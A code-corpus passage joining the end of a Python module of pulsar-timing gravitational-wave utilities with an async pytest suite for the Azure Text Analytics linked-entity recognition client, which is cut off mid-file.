cm = cospm / (n * omega - 2 * gammadot) - cospp / (n * omega + 2 * gammadot)
splus_n = -0.5 * (1 + np.cos(inc) ** 2) * (an * sp - bn * sm) + (1 - np.cos(inc) ** 2) * cn * sinp1
scross_n = np.cos(inc) * (an * cm - bn * cp)
return np.sum(splus_n, axis=1), np.sum(scross_n, axis=1)
def create_gw_antenna_pattern(pos, gwtheta, gwphi):
"""
Function to create pulsar antenna pattern functions as defined
in Ellis, Siemens, and Creighton (2012).
:param pos: Unit vector from Earth to pulsar
:param gwtheta: GW polar angle in radians
:param gwphi: GW azimuthal angle in radians
:return: (fplus, fcross, cosMu), where fplus and fcross
are the plus and cross antenna pattern functions
and cosMu is the cosine of the angle between the
pulsar and the GW source.
"""
# use definition from Sesana et al 2010 and Ellis et al 2012
m = np.array([np.sin(gwphi), -np.cos(gwphi), 0.0])
n = np.array([-np.cos(gwtheta) * np.cos(gwphi), -np.cos(gwtheta) * np.sin(gwphi), np.sin(gwtheta)])
omhat = np.array([-np.sin(gwtheta) * np.cos(gwphi), -np.sin(gwtheta) * np.sin(gwphi), -np.cos(gwtheta)])
fplus = 0.5 * (np.dot(m, pos) ** 2 - np.dot(n, pos) ** 2) / (1 + np.dot(omhat, pos))
fcross = (np.dot(m, pos) * np.dot(n, pos)) / (1 + np.dot(omhat, pos))
cosMu = -np.dot(omhat, pos)
return fplus, fcross, cosMu
@function
def bwm_delay(toas, pos, log10_h=-14.0, cos_gwtheta=0.0, gwphi=0.0, gwpol=0.0, t0=55000, antenna_pattern_fn=None):
"""
Function that calculates the earth-term gravitational-wave
burst-with-memory signal, as described in:
Seto et al, van haasteren and Levin, phsirkov et al, Cordes and Jenet.
This version uses the F+/Fx polarization modes, as verified with the
Continuous Wave and Anisotropy papers.
:param toas: Time-of-arrival measurements [s]
:param pos: Unit vector from Earth to pulsar
:param log10_h: log10 of GW strain
:param cos_gwtheta: Cosine of GW polar angle
:param gwphi: GW azimuthal polar angle [rad]
:param gwpol: GW polarization angle
:param t0: Burst central time [day]
:param antenna_pattern_fn:
User defined function that takes `pos`, `gwtheta`, `gwphi` as
arguments and returns (fplus, fcross)
:return: the waveform as induced timing residuals (seconds)
"""
# convert
h = 10 ** log10_h
gwtheta = np.arccos(cos_gwtheta)
t0 *= const.day
# antenna patterns
if antenna_pattern_fn is None:
apc = create_gw_antenna_pattern(pos, gwtheta, gwphi)
else:
apc = antenna_pattern_fn(pos, gwtheta, gwphi)
# grab fplus, fcross
fp, fc = apc[0], apc[1]
# combined polarization
pol = np.cos(2 * gwpol) * fp + np.sin(2 * gwpol) * fc
# Return the time-series for the pulsar
return pol * h * np.heaviside(toas - t0, 0.5) * (toas - t0)
@function
def create_quantization_matrix(toas, dt=1, nmin=2):
"""Create quantization matrix mapping TOAs to observing epochs."""
isort = np.argsort(toas)
bucket_ref = [toas[isort[0]]]
bucket_ind = [[isort[0]]]
for i in isort[1:]:
if toas[i] - bucket_ref[-1] < dt:
bucket_ind[-1].append(i)
else:
bucket_ref.append(toas[i])
bucket_ind.append([i])
# find only epochs with more than 1 TOA
bucket_ind2 = [ind for ind in bucket_ind if len(ind) >= nmin]
U = np.zeros((len(toas), len(bucket_ind2)), "d")
for i, l in enumerate(bucket_ind2):
U[l, i] = 1
weights = np.ones(U.shape[1])
return U, weights
def quant2ind(U):
"""
Use quantization matrix to return slices of non-zero elements.
:param U: quantization matrix
:return: list of `slice`s for non-zero elements of U
.. note:: This function assumes that the pulsar TOAs were sorted by time.
"""
inds = []
for cc, col in enumerate(U.T):
epinds = np.flatnonzero(col)
if epinds[-1] - epinds[0] + 1 != len(epinds):
raise ValueError("ERROR: TOAs not sorted properly!")
inds.append(slice(epinds[0], epinds[-1] + 1))
return inds
def linear_interp_basis(toas, dt=30 * 86400):
"""Provides a basis for linear interpolation.
:param toas: Pulsar TOAs in seconds
:param dt: Linear interpolation step size in seconds.
:returns: Linear interpolation basis and nodes
"""
# evenly spaced points
x = np.arange(toas.min(), toas.max() + dt, dt)
M = np.zeros((len(toas), len(x)))
# make linear interpolation basis
for ii in range(len(x) - 1):
idx = np.logical_and(toas >= x[ii], toas <= x[ii + 1])
M[idx, ii] = (toas[idx] - x[ii + 1]) / (x[ii] - x[ii + 1])
M[idx, ii + 1] = (toas[idx] - x[ii]) / (x[ii + 1] - x[ii])
# only return non-zero columns
idx = M.sum(axis=0) != 0
return M[:, idx], x[idx]
# overlap reduction functions
@function
def hd_orf(pos1, pos2):
"""Hellings & Downs spatial correlation function."""
if np.all(pos1 == pos2):
return 1
else:
omc2 = (1 - np.dot(pos1, pos2)) / 2
return 1.5 * omc2 * np.log(omc2) - 0.25 * omc2 + 0.5
@function
def dipole_orf(pos1, pos2):
"""Dipole spatial correlation function."""
if np.all(pos1 == pos2):
return 1 + 1e-5
else:
return np.dot(pos1, pos2)
@function
def monopole_orf(pos1, pos2):
"""Monopole spatial correlation function."""
if np.all(pos1 == pos2):
return 1.0 + 1e-5
else:
return 1.0
@function
def anis_orf(pos1, pos2, params, **kwargs):
"""Anisotropic GWB spatial correlation function."""
anis_basis = kwargs["anis_basis"]
psrs_pos = kwargs["psrs_pos"]
lmax = kwargs["lmax"]
psr1_index = [ii for ii in range(len(psrs_pos)) if np.all(psrs_pos[ii] == pos1)][0]
psr2_index = [ii for ii in range(len(psrs_pos)) if np.all(psrs_pos[ii] == pos2)][0]
clm = np.zeros((lmax + 1) ** 2)
clm[0] = 2.0 * np.sqrt(np.pi)
if lmax > 0:
clm[1:] = params
return sum(clm[ii] * basis for ii, basis in enumerate(anis_basis[: (lmax + 1) ** 2, psr1_index, psr2_index]))
@function
def unnormed_tm_basis(Mmat):
return Mmat, np.ones_like(Mmat.shape[1])
@function
def normed_tm_basis(Mmat, norm=None):
if norm is None:
norm = np.sqrt(np.sum(Mmat ** 2, axis=0))
nmat = Mmat / norm
nmat[:, norm == 0] = 0
return nmat, np.ones_like(Mmat.shape[1])
@function
def svd_tm_basis(Mmat):
u, s, v = np.linalg.svd(Mmat, full_matrices=False)
return u, np.ones_like(s)
@function
def tm_prior(weights):
return weights * 1e40
# Physical ephemeris model utility functions
def get_planet_orbital_elements(model="setIII"):
"""Grab physical ephemeris model files"""
dpath = enterprise.__path__[0] + "/datafiles/ephemeris/"
return (
np.load(dpath + "/jupiter-" + model + "-mjd.npy"),
np.load(dpath + "/jupiter-" + model + "-xyz-svd.npy"),
np.load(dpath + "/saturn-" + model + "-xyz-svd.npy"),
)
def ecl2eq_vec(x):
"""
Rotate (n,3) vector time series from ecliptic to equatorial.
"""
M_ecl = const.M_ecl
return np.einsum("jk,ik->ij", M_ecl, x)
def eq2ecl_vec(x):
"""
Rotate (n,3) vector time series from equatorial to ecliptic.
"""
M_ecl = const.M_ecl
return np.einsum("kj,ik->ij", M_ecl, x)
def euler_vec(z, y, x, n):
"""
Return (n,3,3) tensor with each (3,3) block containing an
Euler rotation with angles z, y, x. Optionally each of z, y, x
can be a vector of length n.
"""
L = np.zeros((n, 3, 3), "d")
cosx, sinx = np.cos(x), np.sin(x)
L[:, 0, 0] = 1
L[:, 1, 1] = L[:, 2, 2] = cosx
L[:, 1, 2] = -sinx
L[:, 2, 1] = sinx
N = np.zeros((n, 3, 3), "d")
cosy, siny = np.cos(y), np.sin(y)
N[:, 0, 0] = N[:, 2, 2] = cosy
N[:, 1, 1] = 1
N[:, 0, 2] = siny
N[:, 2, 0] = -siny
ret = np.einsum("ijk,ikl->ijl", L, N)
M = np.zeros((n, 3, 3), "d")
cosz, sinz = np.cos(z), np.sin(z)
M[:, 0, 0] = M[:, 1, 1] = cosz
M[:, 0, 1] = -sinz
M[:, 1, 0] = sinz
M[:, 2, 2] = 1
ret = np.einsum("ijk,ikl->ijl", ret, M)
return ret
def ss_framerotate(mjd, planet, x, y, z, dz, offset=None, equatorial=False):
"""
Rotate planet trajectory given as (n,3) tensor,
by ecliptic Euler angles x, y, z, and by z rate
dz. The rate has units of rad/year, and is referred
to offset 2010/1/1. dates must be given in MJD.
"""
t_offset = 55197.0 # MJD 2010/01/01
if equatorial:
planet = eq2ecl_vec(planet)
E = euler_vec(z + dz * (mjd - t_offset) / 365.25, y, x, planet.shape[0])
planet = np.einsum("ijk,ik->ij", E, planet)
if offset is not None:
planet = np.array(offset) + planet
if equatorial:
planet = ecl2eq_vec(planet)
return planet
def dmass(planet, dm_over_Msun):
return dm_over_Msun * planet
@function
def physicalephem_spectrum(sigmas):
# note the creative use of the "labels" (the very sigmas, not frequencies)
return sigmas ** 2
@function
def createfourierdesignmatrix_physicalephem(
toas,
planetssb,
pos_t,
frame_drift_rate=1e-9,
d_jupiter_mass=1.54976690e-11,
d_saturn_mass=8.17306184e-12,
d_uranus_mass=5.71923361e-11,
d_neptune_mass=7.96103855e-11,
jup_orb_elements=0.05,
sat_orb_elements=0.5,
model="setIII",
):
"""
Construct physical ephemeris perturbation design matrix and 'frequencies'.
Parameters can be excluded by setting the corresponding prior sigma to None
:param toas: vector of time series in seconds
:param pos: pulsar position as Cartesian vector
:param frame_drift_rate: normal sigma for frame drift rate
:param d_jupiter_mass: normal sigma for Jupiter mass perturbation
:param d_saturn_mass: normal sigma for Saturn mass perturbation
:param d_uranus_mass: normal sigma for Uranus mass perturbation
:param d_neptune_mass: normal sigma for Neptune mass perturbation
:param jup_orb_elements: normal sigma for Jupiter orbital elem. perturb.
:param sat_orb_elements: normal sigma for Saturn orbital elem. perturb.
:param model: vector basis used by Jupiter and Saturn perturb.;
see PhysicalEphemerisSignal, defaults to "setIII"
:return: F: Fourier design matrix of shape (len(toas), nvecs)
:return: sigmas: Phi sigmas (nvecs, to be passed to physicalephem_spectrum)
"""
# Jupiter + Saturn orbit definitions that we pass to physical_ephem_delay
oa = {}
(oa["times"], oa["jup_orbit"], oa["sat_orbit"]) = get_planet_orbital_elements(model)
dpar = 1e-5 # may need finessing
Fl, Phil = [], []
for parname in [
"frame_drift_rate",
"d_jupiter_mass",
"d_saturn_mass",
"d_uranus_mass",
"d_neptune_mass",
"jup_orb_elements",
"sat_orb_elements",
]:
ppar = locals()[parname]
if ppar:
if parname not in ["jup_orb_elements", "sat_orb_elements"]:
# need to normalize?
Fl.append(physical_ephem_delay(toas, planetssb, pos_t, **{parname: dpar}) / dpar)
Phil.append(ppar)
else:
for i in range(6):
c = np.zeros(6)
c[i] = dpar
# Fl.append(physical_ephem_delay(toas, planetssb, pos_t,
# **{parname: c}, **oa)/dpar)
kwarg_dict = {parname: c}
kwarg_dict.update(oa)
Fl.append(physical_ephem_delay(toas, planetssb, pos_t, **kwarg_dict) / dpar)
Phil.append(ppar)
return np.array(Fl).T.copy(), np.array(Phil)
@function
def physical_ephem_delay(
toas,
planetssb,
pos_t,
frame_drift_rate=0,
d_jupiter_mass=0,
d_saturn_mass=0,
d_uranus_mass=0,
d_neptune_mass=0,
jup_orb_elements=np.zeros(6, "d"),
sat_orb_elements=np.zeros(6, "d"),
times=None,
jup_orbit=None,
sat_orbit=None,
equatorial=True,
):
# convert toas to MJD
mjd = toas / 86400
# grab planet-to-SSB vectors
earth = planetssb[:, 2, :3]
jupiter = planetssb[:, 4, :3]
saturn = planetssb[:, 5, :3]
uranus = planetssb[:, 6, :3]
neptune = planetssb[:, 7, :3]
# do frame rotation
earth = ss_framerotate(mjd, earth, 0.0, 0.0, 0.0, frame_drift_rate, offset=None, equatorial=equatorial)
# mass perturbations
for planet, dm in [
(jupiter, d_jupiter_mass),
(saturn, d_saturn_mass),
(uranus, d_uranus_mass),
(neptune, d_neptune_mass),
]:
earth += dmass(planet, dm)
# Jupiter orbit perturbation
if np.any(jup_orb_elements):
tmp = 0.0009547918983127075 * np.einsum("i,ijk->jk", jup_orb_elements, jup_orbit)
earth += np.array([np.interp(mjd, times, tmp[:, aa]) for aa in range(3)]).T
# Saturn orbit perturbation
if np.any(sat_orb_elements):
tmp = 0.00028588567008942334 * np.einsum("i,ijk->jk", sat_orb_elements, sat_orbit)
earth += np.array([np.interp(mjd, times, tmp[:, aa]) for aa in range(3)]).T
# construct the true geocenter to barycenter roemer
tmp_roemer = np.einsum("ij,ij->i", planetssb[:, 2, :3], pos_t)
# create the delay
delay = tmp_roemer - np.einsum("ij,ij->i", earth, pos_t)
return delay
| jellis18/enterprise | enterprise/signals/utils.py | Python | mit | 29,066 |
# ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
import os
import pytest
import platform
import functools
from azure.core.exceptions import HttpResponseError, ClientAuthenticationError
from azure.core.credentials import AzureKeyCredential
from azure.ai.textanalytics.aio import TextAnalyticsClient
from azure.ai.textanalytics import (
VERSION,
DetectLanguageInput,
TextDocumentInput,
TextAnalyticsApiVersion,
)
from testcase import TextAnalyticsPreparer
from testcase import TextAnalyticsClientPreparer as _TextAnalyticsClientPreparer
from devtools_testutils.aio import recorded_by_proxy_async
from testcase import TextAnalyticsTest
# pre-apply the client_cls positional argument so it needn't be explicitly passed below
TextAnalyticsClientPreparer = functools.partial(_TextAnalyticsClientPreparer, TextAnalyticsClient)
class TestRecognizeLinkedEntities(TextAnalyticsTest):
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_no_single_input(self, client):
with pytest.raises(TypeError):
response = await client.recognize_linked_entities("hello world")
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_all_successful_passing_dict(self, client):
docs = [{"id": "1", "language": "en", "text": "Microsoft was founded by Bill Gates and Paul Allen"},
{"id": "2", "language": "es", "text": "Microsoft fue fundado por Bill Gates y Paul Allen"}]
response = await client.recognize_linked_entities(docs, show_stats=True)
for doc in response:
assert len(doc.entities) == 3
assert doc.id is not None
assert doc.statistics is not None
for entity in doc.entities:
assert entity.name is not None
assert entity.language is not None
assert entity.data_source_entity_id is not None
assert entity.url is not None
assert entity.data_source is not None
assert entity.matches is not None
for match in entity.matches:
assert match.offset is not None
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_all_successful_passing_text_document_input(self, client):
docs = [
TextDocumentInput(id="1", text="Microsoft was founded by Bill Gates and Paul Allen"),
TextDocumentInput(id="2", text="Microsoft fue fundado por Bill Gates y Paul Allen")
]
response = await client.recognize_linked_entities(docs)
for doc in response:
assert len(doc.entities) == 3
for entity in doc.entities:
assert entity.name is not None
assert entity.language is not None
assert entity.data_source_entity_id is not None
assert entity.url is not None
assert entity.data_source is not None
assert entity.matches is not None
for match in entity.matches:
assert match.offset is not None
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_passing_only_string(self, client):
docs = [
"Microsoft was founded by Bill Gates and Paul Allen",
"Microsoft fue fundado por Bill Gates y Paul Allen",
""
]
response = await client.recognize_linked_entities(docs)
assert len(response[0].entities) == 3
assert len(response[1].entities) == 3
assert response[2].is_error
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_input_with_some_errors(self, client):
docs = [{"id": "1", "text": ""},
{"id": "2", "language": "es", "text": "Microsoft fue fundado por Bill Gates y Paul Allen"}]
response = await client.recognize_linked_entities(docs)
assert response[0].is_error
assert not response[1].is_error
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_input_with_all_errors(self, client):
docs = [{"id": "1", "text": ""},
{"id": "2", "language": "Spanish", "text": "Microsoft fue fundado por Bill Gates y Paul Allen"}]
response = await client.recognize_linked_entities(docs)
assert response[0].is_error
assert response[1].is_error
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_too_many_documents(self, client):
docs = ["One", "Two", "Three", "Four", "Five", "Six"]
with pytest.raises(HttpResponseError) as excinfo:
await client.recognize_linked_entities(docs)
assert excinfo.value.status_code == 400
assert excinfo.value.error.code == "InvalidDocumentBatch"
assert "Batch request contains too many records" in str(excinfo.value)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_output_same_order_as_input(self, client):
docs = [
TextDocumentInput(id="1", text="one"),
TextDocumentInput(id="2", text="two"),
TextDocumentInput(id="3", text="three"),
TextDocumentInput(id="4", text="four"),
TextDocumentInput(id="5", text="five")
]
response = await client.recognize_linked_entities(docs)
for idx, doc in enumerate(response):
assert str(idx + 1) == doc.id
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer(client_kwargs={"textanalytics_test_api_key": ""})
@recorded_by_proxy_async
async def test_empty_credential_class(self, client):
with pytest.raises(ClientAuthenticationError):
response = await client.recognize_linked_entities(
["This is written in English."]
)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer(client_kwargs={"textanalytics_test_api_key": "xxxxxxxxxxxx"})
@recorded_by_proxy_async
async def test_bad_credentials(self, client):
with pytest.raises(ClientAuthenticationError):
response = await client.recognize_linked_entities(
["This is written in English."]
)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_bad_document_input(self, client):
docs = "This is the wrong type"
with pytest.raises(TypeError):
response = await client.recognize_linked_entities(docs)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_mixing_inputs(self, client):
docs = [
{"id": "1", "text": "Microsoft was founded by Bill Gates and Paul Allen."},
TextDocumentInput(id="2", text="I did not like the hotel we stayed at. It was too expensive."),
"You cannot mix string input with the above inputs"
]
with pytest.raises(TypeError):
response = await client.recognize_linked_entities(docs)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_out_of_order_ids(self, client):
docs = [{"id": "56", "text": ":)"},
{"id": "0", "text": ":("},
{"id": "22", "text": ""},
{"id": "19", "text": ":P"},
{"id": "1", "text": ":D"}]
response = await client.recognize_linked_entities(docs)
in_order = ["56", "0", "22", "19", "1"]
for idx, resp in enumerate(response):
assert resp.id == in_order[idx]
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_show_stats_and_model_version(self, client):
def callback(response):
assert response is not None
assert response.model_version
assert response.raw_response is not None
assert response.statistics.document_count == 5
assert response.statistics.transaction_count == 4
assert response.statistics.valid_document_count == 4
assert response.statistics.erroneous_document_count == 1
docs = [{"id": "56", "text": ":)"},
{"id": "0", "text": ":("},
{"id": "22", "text": ""},
{"id": "19", "text": ":P"},
{"id": "1", "text": ":D"}]
response = await client.recognize_linked_entities(
docs,
show_stats=True,
model_version="latest",
raw_response_hook=callback
)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_batch_size_over_limit(self, client):
docs = ["hello world"] * 1050
with pytest.raises(HttpResponseError):
response = await client.recognize_linked_entities(docs)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_whole_batch_language_hint(self, client):
def callback(resp):
language_str = "\"language\": \"fr\""
language = resp.http_request.body.count(language_str)
assert language == 3
docs = [
"This was the best day of my life.",
"I did not like the hotel we stayed at. It was too expensive.",
"The restaurant was not as good as I hoped."
]
response = await client.recognize_linked_entities(docs, language="fr", raw_response_hook=callback)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_whole_batch_dont_use_language_hint(self, client):
def callback(resp):
language_str = "\"language\": \"\""
language = resp.http_request.body.count(language_str)
assert language == 3
docs = [
"This was the best day of my life.",
"I did not like the hotel we stayed at. It was too expensive.",
"The restaurant was not as good as I hoped."
]
response = await client.recognize_linked_entities(docs, language="", raw_response_hook=callback)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_per_item_dont_use_language_hint(self, client):
def callback(resp):
language_str = "\"language\": \"\""
language = resp.http_request.body.count(language_str)
assert language == 2
language_str = "\"language\": \"en\""
language = resp.http_request.body.count(language_str)
assert language == 1
docs = [{"id": "1", "language": "", "text": "I will go to the park."},
{"id": "2", "language": "", "text": "I did not like the hotel we stayed at."},
{"id": "3", "text": "The restaurant had really good food."}]
response = await client.recognize_linked_entities(docs, raw_response_hook=callback)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_whole_batch_language_hint_and_obj_input(self, client):
def callback(resp):
language_str = "\"language\": \"de\""
language = resp.http_request.body.count(language_str)
assert language == 3
docs = [
TextDocumentInput(id="1", text="I should take my cat to the veterinarian."),
TextDocumentInput(id="4", text="Este es un document escrito en Español."),
TextDocumentInput(id="3", text="猫は幸せ"),
]
response = await client.recognize_linked_entities(docs, language="de", raw_response_hook=callback)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_whole_batch_language_hint_and_obj_per_item_hints(self, client):
def callback(resp):
language_str = "\"language\": \"es\""
language = resp.http_request.body.count(language_str)
assert language == 2
language_str = "\"language\": \"en\""
language = resp.http_request.body.count(language_str)
assert language == 1
docs = [
TextDocumentInput(id="1", text="I should take my cat to the veterinarian.", language="es"),
TextDocumentInput(id="2", text="Este es un document escrito en Español.", language="es"),
TextDocumentInput(id="3", text="猫は幸せ"),
]
response = await client.recognize_linked_entities(docs, language="en", raw_response_hook=callback)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_whole_batch_language_hint_and_dict_per_item_hints(self, client):
def callback(resp):
language_str = "\"language\": \"es\""
language = resp.http_request.body.count(language_str)
assert language == 2
language_str = "\"language\": \"en\""
language = resp.http_request.body.count(language_str)
assert language == 1
docs = [{"id": "1", "language": "es", "text": "I will go to the park."},
{"id": "2", "language": "es", "text": "I did not like the hotel we stayed at."},
{"id": "3", "text": "The restaurant had really good food."}]
response = await client.recognize_linked_entities(docs, language="en", raw_response_hook=callback)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer(client_kwargs={"default_language": "es"})
@recorded_by_proxy_async
async def test_client_passed_default_language_hint(self, client):
def callback(resp):
language_str = "\"language\": \"es\""
language = resp.http_request.body.count(language_str)
assert language == 3
def callback_2(resp):
language_str = "\"language\": \"en\""
language = resp.http_request.body.count(language_str)
assert language == 3
docs = [{"id": "1", "text": "I will go to the park."},
{"id": "2", "text": "I did not like the hotel we stayed at."},
{"id": "3", "text": "The restaurant had really good food."}]
response = await client.recognize_linked_entities(docs, raw_response_hook=callback)
response = await client.recognize_linked_entities(docs, language="en", raw_response_hook=callback_2)
response = await client.recognize_linked_entities(docs, raw_response_hook=callback)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_invalid_language_hint_method(self, client):
response = await client.recognize_linked_entities(
["This should fail because we're passing in an invalid language hint"], language="notalanguage"
)
assert response[0].error.code == 'UnsupportedLanguageCode'
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_invalid_language_hint_docs(self, client):
response = await client.recognize_linked_entities(
[{"id": "1", "language": "notalanguage", "text": "This should fail because we're passing in an invalid language hint"}]
)
assert response[0].error.code == 'UnsupportedLanguageCode'
@TextAnalyticsPreparer()
@recorded_by_proxy_async
async def test_rotate_subscription_key(self, textanalytics_test_endpoint, textanalytics_test_api_key):
credential = AzureKeyCredential(textanalytics_test_api_key)
client = TextAnalyticsClient(textanalytics_test_endpoint, credential)
docs = [{"id": "1", "text": "I will go to the park."},
{"id": "2", "text": "I did not like the hotel we stayed at."},
{"id": "3", "text": "The restaurant had really good food."}]
response = await client.recognize_linked_entities(docs)
assert response is not None
credential.update("xxx") # Make authentication fail
with pytest.raises(ClientAuthenticationError):
response = await client.recognize_linked_entities(docs)
credential.update(textanalytics_test_api_key) # Authenticate successfully again
response = await client.recognize_linked_entities(docs)
assert response is not None
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_user_agent(self, client):
def callback(resp):
assert "azsdk-python-ai-textanalytics/{} Python/{} ({})".format(
VERSION, platform.python_version(), platform.platform()) in \
resp.http_request.headers["User-Agent"]
docs = [{"id": "1", "text": "I will go to the park."},
{"id": "2", "text": "I did not like the hotel we stayed at."},
{"id": "3", "text": "The restaurant had really good food."}]
response = await client.recognize_linked_entities(docs, raw_response_hook=callback)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_document_attribute_error_no_result_attribute(self, client):
docs = [{"id": "1", "text": ""}]
response = await client.recognize_linked_entities(docs)
# Attributes on DocumentError
assert response[0].is_error
assert response[0].id == "1"
assert response[0].error is not None
# Result attribute not on DocumentError, custom error message
try:
entities = response[0].entities
except AttributeError as custom_error:
assert custom_error.args[0] == \
'\'DocumentError\' object has no attribute \'entities\'. ' \
'The service was unable to process this document:\nDocument Id: 1\nError: ' \
'InvalidDocument - Document text is empty.\n'
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_document_attribute_error_nonexistent_attribute(self, client):
docs = [{"id": "1", "text": ""}]
response = await client.recognize_linked_entities(docs)
# Attribute not found on DocumentError or result obj, default behavior/message
try:
entities = response[0].attribute_not_on_result_or_error
except AttributeError as default_behavior:
assert default_behavior.args[0] == '\'DocumentError\' object has no attribute \'attribute_not_on_result_or_error\''
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_bad_model_version_error(self, client):
docs = [{"id": "1", "language": "english", "text": "I did not like the hotel we stayed at."}]
try:
result = await client.recognize_linked_entities(docs, model_version="bad")
except HttpResponseError as err:
assert err.error.code == "ModelVersionIncorrect"
assert err.error.message is not None
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_document_errors(self, client):
text = ""
for _ in range(5121):
text += "x"
docs = [{"id": "1", "text": ""},
{"id": "2", "language": "english", "text": "I did not like the hotel we stayed at."},
{"id": "3", "text": text}]
doc_errors = await client.recognize_linked_entities(docs)
assert doc_errors[0].error.code == "InvalidDocument"
assert doc_errors[0].error.message is not None
assert doc_errors[1].error.code == "UnsupportedLanguageCode"
assert doc_errors[1].error.message is not None
assert doc_errors[2].error.code == "InvalidDocument"
assert doc_errors[2].error.message is not None
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_document_warnings(self, client):
# No warnings actually returned for recognize_linked_entities. Will update when they add
docs = [
{"id": "1", "text": "This won't actually create a warning :'("},
]
result = await client.recognize_linked_entities(docs)
for doc in result:
doc_warnings = doc.warnings
assert len(doc_warnings) == 0
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_not_passing_list_for_docs(self, client):
docs = {"id": "1", "text": "hello world"}
with pytest.raises(TypeError) as excinfo:
await client.recognize_linked_entities(docs)
assert "Input documents cannot be a dict" in str(excinfo.value)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_missing_input_records_error(self, client):
docs = []
with pytest.raises(ValueError) as excinfo:
await client.recognize_linked_entities(docs)
assert "Input documents can not be empty or None" in str(excinfo.value)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_passing_none_docs(self, client):
with pytest.raises(ValueError) as excinfo:
await client.recognize_linked_entities(None)
assert "Input documents can not be empty or None" in str(excinfo.value)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_duplicate_ids_error(self, client):
# Duplicate Ids
docs = [{"id": "1", "text": "hello world"},
{"id": "1", "text": "I did not like the hotel we stayed at."}]
try:
result = await client.recognize_linked_entities(docs)
except HttpResponseError as err:
assert err.error.code == "InvalidDocument"
assert err.error.message is not None
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_batch_size_over_limit_error(self, client):
# Batch size over limit
docs = ["hello world"] * 1001
try:
response = await client.recognize_linked_entities(docs)
except HttpResponseError as err:
assert err.error.code == "InvalidDocumentBatch"
assert err.error.message is not None
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_language_kwarg_spanish(self, client):
def callback(response):
language_str = "\"language\": \"es\""
assert response.http_request.body.count(language_str) == 1
assert response.model_version is not None
assert response.statistics is not None
res = await client.recognize_linked_entities(
documents=["Bill Gates is the CEO of Microsoft."],
model_version="latest",
show_stats=True,
language="es",
raw_response_hook=callback
)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_pass_cls(self, client):
def callback(pipeline_response, deserialized, _):
return "cls result"
res = await client.recognize_linked_entities(
documents=["Test passing cls to endpoint"],
cls=callback
)
assert res == "cls result"
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_offset(self, client):
result = await client.recognize_linked_entities(["Microsoft was founded by Bill Gates and Paul Allen"])
entities = result[0].entities
# the entities are being returned in a non-sequential order by the service
microsoft_entity = [entity for entity in entities if entity.name == "Microsoft"][0]
bill_gates_entity = [entity for entity in entities if entity.name == "Bill Gates"][0]
paul_allen_entity = [entity for entity in entities if entity.name == "Paul Allen"][0]
assert microsoft_entity.matches[0].offset == 0
assert bill_gates_entity.matches[0].offset == 25
assert paul_allen_entity.matches[0].offset == 40
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer(client_kwargs={"api_version": TextAnalyticsApiVersion.V3_0})
@recorded_by_proxy_async
async def test_no_offset_v3_linked_entity_match(self, client):
result = await client.recognize_linked_entities(["Microsoft was founded by Bill Gates and Paul Allen"])
entities = result[0].entities
assert entities[0].matches[0].offset is None
assert entities[1].matches[0].offset is None
assert entities[2].matches[0].offset is None
@TextAnalyticsPreparer()
